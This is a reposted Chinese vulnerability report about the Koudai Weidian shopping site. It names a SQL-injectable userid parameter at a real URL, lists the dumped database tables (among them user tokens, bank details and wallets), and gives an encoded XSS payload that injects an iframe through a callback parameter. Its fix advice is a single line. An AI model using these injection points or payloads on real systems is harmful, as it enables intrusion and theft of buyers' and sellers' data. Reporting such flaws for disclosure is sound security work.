网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

口袋购物微店注入可获取敏感数据 - 网站安全

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 口袋购物微店站点存在sql注入、跨站等。注入点:http: wd koudai com vshop 1 H5 H5ShopInfo php?userid=52callback=jsonpcallback_1400737639575_8703400159720331ver=51402userid存在注入+----------------...

口袋购物微店站点存在sql注入、跨站等。

 

注入点:http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402

userid存在注入



+-------------------------+
| account_statistics      |
| account_type            |
| active                  |
| address                 |
| address_book            |
| admin_contact           |
| android_info            |
| black_list              |
| bmb_task                |
| buyer_action            |
| buyer_identity          |
| buyer_info              |
| buyer_note              |
| buyer_ua                |
| cate_info               |
| cate_item               |
| complaint               |
| csc_task                |
| csc_task_process        |
| custom                  |
| custom_detail           |
| custom_group            |
| custom_order            |
| express_info            |
| express_note            |
| express_state_info      |
| friend_dynamic          |
| gps                     |
| ios_info                |
| item_bg_category        |
| item_info               |
| item_sku                |
| item_souce              |
| login_info              |
| market_apply            |
| market_record           |
| market_seller_item      |
| market_user             |
| offer_price             |
| order_chargeback        |
| order_desc_info         |
| order_discount          |
| order_fr                |
| order_fr_info           |
| order_info              |
| order_pay               |
| order_refund            |
| order_status_history    |
| order_warrant           |
| pay_batch_no            |
| pay_commission_batch_no |
| pay_commission_note     |
| pay_detail              |
| pay_history             |
| pay_note                |
| pay_seller_id           |
| pay_task                |
| pay_withdrawals_num     |
| phone_valid             |
| role_action             |
| role_info               |
| seal_off                |
| sell_summary            |
| shop_friend             |
| sms_log                 |
| summary_info            |
| tb_move_status          |
| unpay_detail            |
| unpay_list              |
| unpay_order             |
| update_bank_num         |
| user_action             |
| user_bank               |
| user_device             |
| user_discount           |
| user_feedback           |
| user_info               |
| user_key                |
| user_token              |
| user_truename_note      |
| user_union              |
| user_union_msg          |
| user_wallet             |
| user_wallet_workflow    |
| web_feedback            |
| web_notice              |
| white_list              |
| wholesale_info          |
+-------------------------+




另外callback参数也没做好过滤

http://wd.koudai.com/wd/cate/getList?callback=jsonpcallback_1400737646118_061060125241056085%22%27%3E%3C%2Fiframe%3E%3CIFRAME+SRC%3D%22www.baidu.com%22%3E&ver=51402¶m=123

修复方案:

做好过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论